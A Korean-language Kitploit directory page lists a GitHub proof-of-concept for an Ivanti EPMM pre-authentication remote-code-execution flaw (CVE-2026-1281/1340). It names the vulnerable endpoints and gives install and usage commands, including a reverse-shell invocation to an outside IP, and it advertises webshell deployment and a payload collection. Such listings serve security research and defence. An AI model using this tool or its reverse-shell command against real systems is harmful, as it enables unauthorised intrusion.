Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — # CVE-2026-1281 및 CVE-2026-1340 개념 증명 - Bash 산술 확장을 통한 Ivanti EPMM 사전 인증 RCE | Kitploit
도구/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

# CVE-2026-1281 및 CVE-2026-1340 개념 증명 - Bash 산술 확장을 통한 Ivanti EPMM 사전 인증 RCE

저장소 보기
61238개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-1281 및 CVE-2026-1340 - Ivanti EPMM 사전 인증 RCE

License Python CVSS

⚠️ 면책 조항: 이 PoC는 교육 및 보안 연구 목적으로만 제공됩니다. 명시적 허가 없이 사용하는 것은 불법입니다.

🎯 설명

Ivanti Endpoint Manager Mobile(EPMM)에 영향을 미치는 CVE-2026-1281 및 CVE-2026-1340 취약점 악용을 위한 완전한 PoC(Proof of Concept)입니다. 이러한 취약점은 Bash 산술 확장(Bash Arithmetic Expansion) 메커니즘을 통해 인증 없이 원격 코드 실행(RCE)을 가능하게 합니다.

취약점

  • CVE-2026-1281 : /mifs/c/appstore/fob/ 엔드포인트의 코드 주입
  • CVE-2026-1340 : /mifs/c/aftstore/fob/ 엔드포인트의 코드 주입
  • CVSS 점수 : 9.8 (Critical)
  • 악용 상태 : 실제 환경에서 활발히 악용 중 (Zero-Day)

🚀 기능

  • ✅ 자동화된 검증 프레임워크 (8개 테스트)
  • ✅ 사전 인증 RCE 악용
  • ✅ 자동 리버스 셸
  • ✅ 웹셸 배포
  • ✅ 50개 이상의 즉시 사용 가능한 페이로드
  • ✅ Blue Team용 탐지 스크립트
  • ✅ 완전한 문서화

📦 설치

git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py

🎯 빠른 사용법

# 취약점 테스트
python3 exploit.py -t https://target.com -c

# RCE 검증
python3 exploit.py -t https://target.com --test-rce

# 리버스 셸
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444

📚 문서

  • 전체 README - 상세 기술 문서
  • 사용 가이드 - 단계별 가이드
  • 페이로드 - 50개 이상의 페이로드 모음
  • Red Team 가이드 - 운영 시나리오

🔗 참조

  • CERT-FR CERTFR-2026-ALE-001
  • Watchtowr Labs 분석
  • CVE-2026-1281
  • CVE-2026-1340

👤 작성자

Mehdi Le Deaut - 사이버보안 컨설턴트 | Red Team 전문가

LinkedIn

⚖️ 라이선스

이 프로젝트는 MIT 라이선스 하에 제공됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.

🙏 감사의 말

  • 신속한 경보를 제공한 CERT-FR
  • 기술 분석을 제공한 Watchtowr Labs
  • 사이버보안 커뮤니티
도구 다운로드